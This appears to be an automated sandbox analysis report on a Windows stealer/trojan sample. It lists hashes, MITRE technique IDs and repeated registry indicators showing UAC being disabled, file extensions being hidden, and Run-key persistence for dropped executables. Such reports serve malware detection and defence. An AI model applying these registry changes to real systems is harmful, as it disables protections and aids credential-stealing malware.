cc9acb4031ffb7d3ee760932d3f0335af8da8927e0aa35364673d2500c1627ad

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
09-07-2023 07:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9951030ee369c5exeexeexeex.exe
Size

194KB
MD5

9951030ee369c5c7b83d2f7ccdb715df
SHA1

4947ce5b34a05d2e4bb3864c18480694b1ebcd3a
SHA256

cc9acb4031ffb7d3ee760932d3f0335af8da8927e0aa35364673d2500c1627ad
SHA512

1a6d34970d403216a656f91a1de55d43c355986c619062d9e0ef4534c31f9224aed76118d5cfda2fa011f1590f125c980931002a7b32740598057a9f2243244e
SSDEEP

3072:JrZhb8TaB3pZkOrLhMDhZRRHAavbDbuz+B7:J9h75G8LhMXsE

Score

10^/10

evasion persistence spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cscript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cscript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cscript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	wmiprvse.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
40	2600	cscript.exe
43	2600	cscript.exe
47	2600	cscript.exe
48	2600	cscript.exe
50	2600	cscript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	PgYEoUks.exe

Executes dropped EXE 2 IoCs

pid	Process
3296	fWgsIgEU.exe
2744	PgYEoUks.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fWgsIgEU.exe = "C:\\Users\\Admin\\LGsEMEok\\fWgsIgEU.exe"	9951030ee369c5exeexeexeex.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PgYEoUks.exe = "C:\\ProgramData\\DeMIIMAc\\PgYEoUks.exe"	9951030ee369c5exeexeexeex.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PgYEoUks.exe = "C:\\ProgramData\\DeMIIMAc\\PgYEoUks.exe"	PgYEoUks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fWgsIgEU.exe = "C:\\Users\\Admin\\LGsEMEok\\fWgsIgEU.exe"	fWgsIgEU.exe

Checks whether UAC is enabled 1 TTPs 50 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9951030ee369c5exeexeexeex.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
